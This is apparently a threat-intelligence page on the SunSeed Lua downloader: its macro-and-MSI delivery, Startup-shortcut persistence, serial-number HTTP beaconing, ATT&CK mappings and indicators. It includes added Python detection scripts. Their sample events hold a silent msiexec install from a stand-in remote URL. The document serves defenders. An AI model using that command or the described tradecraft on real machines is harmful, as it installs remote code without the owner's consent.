SunSeed
SunSeed is a Lua-based downloader used in campaigns tracked by Proofpoint, notably the Asylum Ambuscade cluster. It has been delivered via spearphishing emails with malicious Excel attachments containing VBA macros that invoke Windows Installer to silently download and install an MSI package. In the February 2022 campaign reported by Proofpoint, the MSI installed legitimate Lua dependencies, a Windows Lua interpreter, and a malicious Lua script named print.lua under C:\ProgramData.security-soft, and established persistence via a Startup shortcut named "Software Protection Service.lnk". The modified Lua interpreter sppsvc.exe was configured to suppress console output.

SunSeed collects the victim host's C: drive partition serial number and sends repeated HTTP GET beacons over port 80, typically every three seconds, appending that serial number to the request path and using the User-Agent "LuaSocket 2.0.2". Its purpose is to retrieve additional Lua code from actor-controlled infrastructure; reported follow-on scripts included an "install" script that downloads AHKBOT and a legitimate AutoHotkey interpreter, and a "move" script used to reassign victim management to another C2 server. Proofpoint also reported SunSeed equivalents implemented in Tcl and VBS.

SunSeed was observed targeting European government personnel involved in refugee logistics related to Ukraine, and later reporting tied its use to broader Asylum Ambuscade espionage and crimeware activity against government entities in Europe and Central Asia, as well as other victim classes. Proofpoint noted functional similarity between SunSeed and the VBS downloader WasabiSeed from the Screentime/TA866 cluster.

High-confidence IOCs directly mentioned include MSI qwerty_setup.msi (SHA-256 31d765deae26fb5cb506635754c700c57f9bd0fc643a622dc0911c42bf93d18f), SunSeed print.lua (SHA-256 7bf33b494c70bd0a0a865b5fbcee0c58fa9274b8741b03695b45998bcd459328), and staging/C2 infrastructure including 84.32.188[.]96.
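Detection logic for the beaconing behaviour described above, added here as an example; it is not Proofpoint's code or anything from the page. It assumes a constructed proxy-log format (timestamp, client IP, method, URL, status, quoted user-agent) and constructed sample lines that use the TEST-NET address 203.0.113.10 in place of the reported C2. The indicators it checks are the ones the page reports: GET over port 80, the "LuaSocket 2.0.2" user-agent, a volume serial as the final path segment, and a three-second cadence. The serial-number shape (8 hex digits, dash optional) and its position as the last path segment are assumptions.

```python
"""Added example (not the page's or Proofpoint's code): flag SunSeed-style
HTTP beaconing in proxy logs.  Indicators are those the page reports: GET over
port 80, User-Agent "LuaSocket 2.0.2", the C: volume serial appended to the
request path, and a roughly three-second cadence.  The log format, the sample
lines and the 203.0.113.10 address are constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed format: ISO timestamp, client IP, method, URL, status, quoted user-agent.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r'^http://(?P<host>[^/:]+)(?::(?P<port>\d+))?(?P<path>/\S*)?$')
SUSPECT_UA = "LuaSocket 2.0.2"          # reported user-agent string
# NTFS volume serials render as 8 hex digits, usually XXXX-XXXX; assumption: SunSeed
# places it in the last path segment, with or without the dash.
SERIAL_RE = re.compile(r'^[0-9A-Fa-f]{4}-?[0-9A-Fa-f]{4}$')

# Constructed sample: one 3-second beacon loop, one normal intranet hit, one lone
# admin curl to the same path (a weak match that should NOT alert on its own).
SAMPLE_LOG = """\
2022-02-24T10:00:00 10.1.2.3 GET http://203.0.113.10/1A2B3C4D 200 "LuaSocket 2.0.2"
2022-02-24T10:00:03 10.1.2.3 GET http://203.0.113.10/1A2B3C4D 200 "LuaSocket 2.0.2"
2022-02-24T10:00:06 10.1.2.3 GET http://203.0.113.10/1A2B3C4D 200 "LuaSocket 2.0.2"
2022-02-24T10:00:09 10.1.2.3 GET http://203.0.113.10/1A2B3C4D 200 "LuaSocket 2.0.2"
2022-02-24T10:00:01 10.1.2.9 GET http://intranet.example/index.html 200 "Mozilla/5.0"
2022-02-24T10:05:00 10.1.2.9 GET http://203.0.113.10/1A2B3C4D 200 "curl/7.79.1"
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    u = URL_RE.match(m["url"])
    if not u:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "method": m["method"],
        "host": u["host"],
        "port": int(u["port"] or 80),
        "path": u["path"] or "/",
        "ua": m["ua"],
    }


def request_indicators(ev):
    """Per-request indicators: the reported UA, and a serial-shaped final path segment on GET/80."""
    hits = []
    if ev["ua"] == SUSPECT_UA:
        hits.append("luasocket_ua")
    last_segment = ev["path"].rstrip("/").rsplit("/", 1)[-1]
    if ev["method"] == "GET" and ev["port"] == 80 and SERIAL_RE.match(last_segment):
        hits.append("serial_in_path")
    return hits


def find_beacons(log_text, period=3.0, tolerance=1.0, min_requests=3):
    """Group requests by (client, host, path) and alert on the SunSeed pattern.

    An alert needs either the exact LuaSocket user-agent, or a serial-shaped path
    combined with a steady cadence near `period` seconds; a lone request that only
    looks like a serial path is not alerted, which keeps one-off curl noise quiet.
    """
    groups = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            groups[(ev["src"], ev["host"], ev["path"])].append(ev)

    alerts = []
    for (src, host, path), evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        hits = set()
        for e in evs:
            hits.update(request_indicators(e))
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(evs, evs[1:])]
        periodic = len(evs) >= min_requests and all(abs(g - period) <= tolerance for g in gaps)
        if periodic:
            hits.add(f"periodic_{int(period)}s")
        if "luasocket_ua" in hits or (periodic and "serial_in_path" in hits):
            alerts.append({"src": src, "host": host, "path": path,
                           "count": len(evs), "indicators": sorted(hits)})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(SAMPLE_LOG):
        print(alert)
```

Run against the constructed sample, only the 10.1.2.3 loop alerts, carrying all three indicators; the single curl request to the same serial-shaped path is parsed but suppressed because it is neither periodic nor carrying the LuaSocket user-agent. Widen `tolerance` if proxy timestamps are coarser than one second, and treat the user-agent match alone as worth a ticket: a stock LuaSocket client on a workstation is unusual regardless of cadence.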
Groups observed using it
2 distinct threat actors attributed by public researchers.
The email included a malicious macro attachment which attempted to download a Lua-based malware dubbed SunSeed.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
“Proofpoint has identified a likely nation-state sponsored phishing campaign… The email included a malicious macro attachment…”
“sent to a European government entity… included a macro enabled XLS file…”
“campaign… using a possibly compromised Ukrainian armed service member’s email account to target European government personnel…”
Execution
2 techniques
“When enabled, it executes a VB macro named ‘Module1’… invoking Windows Installer to call out… and download a malicious MSI package.”
“installed… a Windows Lua interpreter… executed a malicious Lua script… dubbed SunSeed… consistently pings the C2 server for additional Lua code, and executes the code upon receiving it…”
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
2 techniques
“creates a Windows Installer (msiexec.exe) object… call out to an actor-controlled staging IP and download a malicious MSI package… ‘completely silent installation.’”
“UILevel… ‘completely silent installation.’ This hides all macro actions… Notably… interpreter… modified so it does not print any output… conceal the malware installation…”
Discovery
1 technique
“obtains the C Drive partition serial number from the host, appends to a URL request…”
Command and Control
2 techniques
“issues GET requests over HTTP via port 80 using a Lua Socket… every three seconds… user agent ‘LuaSocket 2.0.2’… to http://84.32.188[.]96/”
“download a malicious MSI package… obtain an MSI install file from a URL, save it to a cached location, and finally begin installation…”
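Host-side hunting logic for the execution, persistence and stealth procedures quoted above, added here as an example; it is not code from the page or from Proofpoint. It assumes a constructed endpoint-event shape (process-creation events with image, parent and command line; file-creation events with the created path) and constructed sample events. Three artifacts from the reporting drive the checks: an Office process handing off to Windows Installer for a remotely sourced MSI, a Startup-folder shortcut named "Software Protection Service.lnk", and a Lua interpreter named sppsvc.exe running from somewhere other than C:\Windows\System32, where the genuine Software Protection service binary lives (a fact about Windows, not taken from the page). The msiexec command line in the sample is a constructed stand-in, since the page describes invocation through the Windows Installer object from the macro, and the Office image set is broader than the Excel case the page reports.

```python
"""Added example (not the page's or Proofpoint's code): triage constructed endpoint
events for the host-side SunSeed artifacts the reporting describes.  Assumptions:
event shape, sample paths, the msiexec command line, and the extra Office images."""
import ntpath

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}  # assumption: page reports Excel only
INSTALLER_IMAGE = "msiexec.exe"
STARTUP_LNK = "software protection service.lnk"              # reported shortcut name
STARTUP_DIR_MARK = "\\start menu\\programs\\startup\\"
LEGIT_SPPSVC = r"c:\windows\system32\sppsvc.exe"             # real Software Protection service binary

# Constructed telemetry: an Office-to-installer handoff, the Startup LNK drop,
# a masquerading sppsvc.exe, and two benign look-alikes that must stay quiet.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent": r"C:\Windows\explorer.exe", "cmdline": '"EXCEL.EXE" attachment.xls'},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "msiexec.exe /i http://203.0.113.10/setup.msi /qn"},   # constructed stand-in
    {"type": "file_create",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Software Protection Service.lnk"},
    {"type": "process", "image": r"C:\ProgramData\example-dir\sppsvc.exe",   # constructed drop dir
     "parent": r"C:\Windows\explorer.exe", "cmdline": "sppsvc.exe print.lua"},
    {"type": "process", "image": r"C:\Windows\System32\sppsvc.exe",
     "parent": r"C:\Windows\System32\services.exe"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe"},
]


def _base(path):
    """Case-folded file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def triage_event(ev):
    """Return the list of SunSeed host indicators matched by one event."""
    hits = []
    if ev["type"] == "process":
        image = _base(ev["image"])
        parent = _base(ev.get("parent", ""))
        cmdline = ev.get("cmdline", "").lower()
        # Macro -> Windows Installer handoff; a URL on the command line marks a remote MSI source.
        if image == INSTALLER_IMAGE and parent in OFFICE_IMAGES:
            hits.append("office_spawned_installer")
            if "http://" in cmdline or "https://" in cmdline:
                hits.append("remote_msi_source")
        # The renamed Lua interpreter borrows a legitimate service name; only the path gives it away.
        if image == "sppsvc.exe" and ev["image"].lower() != LEGIT_SPPSVC:
            hits.append("sppsvc_outside_system32")
    elif ev["type"] == "file_create":
        target = ev["target"].lower()
        if STARTUP_DIR_MARK in target and _base(target) == STARTUP_LNK:
            hits.append("startup_lnk_sunseed_name")
    return hits


def triage(events):
    """Return (event index, indicators) for every event that matched at least one indicator."""
    results = []
    for i, ev in enumerate(events):
        hits = triage_event(ev)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, indicators in triage(SAMPLE_EVENTS):
        print(index, indicators)
```

The two benign events (the real sppsvc.exe and an installer started by the service control manager) produce no hits, which is the point of keying the sppsvc check on full path rather than file name and the installer check on parent process rather than on msiexec alone. Each indicator is weak on its own; the Office-spawned installer with a remote source is the one worth paging on, and the other two confirm a SunSeed install after the fact.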
IOCs tracked for this family
25 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news.
Lua-based looping downloader (not directly observed in the TA866 campaigns in this report) described as functionally similar to WasabiSeed: repeatedly downloads payloads in a loop and uses the C: drive serial as part of the URL path.
Lua-based downloader delivered via macro-enabled Excel attachment that uses Windows Installer (msiexec/InstallProduct) to fetch an MSI, installs Lua runtime/dependencies, establishes persistence via a Startup LNK, and repeatedly beacons over HTTP (LuaSocket UA) to retrieve and execute additional Lua code; appends the host C: volume serial number to C2 requests for victim tracking/selection.
Script-based first-stage downloader (Lua/Tcl/VBS variants) that contacts a C2 over HTTP, retrieves and executes additional code (Lua variants), and can download/install the next stage (e.g., AHKBOT via AutoHotkey interpreter).